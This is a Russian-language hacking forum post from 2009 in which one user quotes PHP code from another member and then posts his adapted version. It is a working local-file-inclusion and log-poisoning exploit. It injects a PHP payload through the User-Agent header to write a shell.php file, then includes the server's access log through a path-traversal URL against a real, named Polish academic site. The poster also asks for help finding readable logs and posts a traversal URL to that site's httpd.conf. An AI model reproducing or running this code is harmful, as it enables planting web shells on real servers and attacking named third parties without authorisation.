Ваши вопросы по уязвимостям.

#11

16.12.2009, 02:13

~~Matnya~~

Banned

Регистрация: 02.12.2009

Сообщений: 23

С нами: 8653381

Репутация: -55

Цитата:

Сообщение от Pashkela

PHP код:


		
			
<?php 

@set_time_limit(0);  

@ini_set("display_errors","1"); 

  function get($url)  

    {  

        $ch = curl_init();    

        curl_setopt($ch, CURLOPT_URL,$url);  

        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  

        curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');  

        curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); 

        $ss=curl_exec($ch);  

        curl_close($ch);  

        return $ss;  

    }  

      $a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');  

      #echo $a; 

      echo 'ok'; 

?>

Pashkela, большое спасибо за код.

вот я проавильно подставил?

PHP код:


		
			
<?php 

@set_time_limit(0);  

@ini_set("display_errors","1"); 

  function get($url)  

    {  

        $ch = curl_init();    

        curl_setopt($ch, CURLOPT_URL,$url);  

        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  

        curl_setopt($ch, CURLOPT_USERAGENT, "<?php fwrite(fopen('shell.php','w+'),'<?php phpinfo();?>') ?>");  

        curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); 

        $ss=curl_exec($ch);  

        curl_close($ch);  

        return $ss;  

    }  

      $a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log');  

      #echo $a; 

      echo 'ok'; 

?>

UDP:

я так понял этот код работает как браузер. токо отличие в том, что он не выводить лог. т.е. там #echo $a;

закоментировано, и поэтому не томозит?. я правильно понял?

UPD: Pashekela, помоги пожалуйста найти рабочие логи, несколько перебрал, не логируют...

вот конфиг http://www.impan.pl/~ecmtb11/index.php?file=../../../../usr/local/apache2/conf/httpd.conf

Последний раз редактировалось Matnya; 16.12.2009 в 02:30..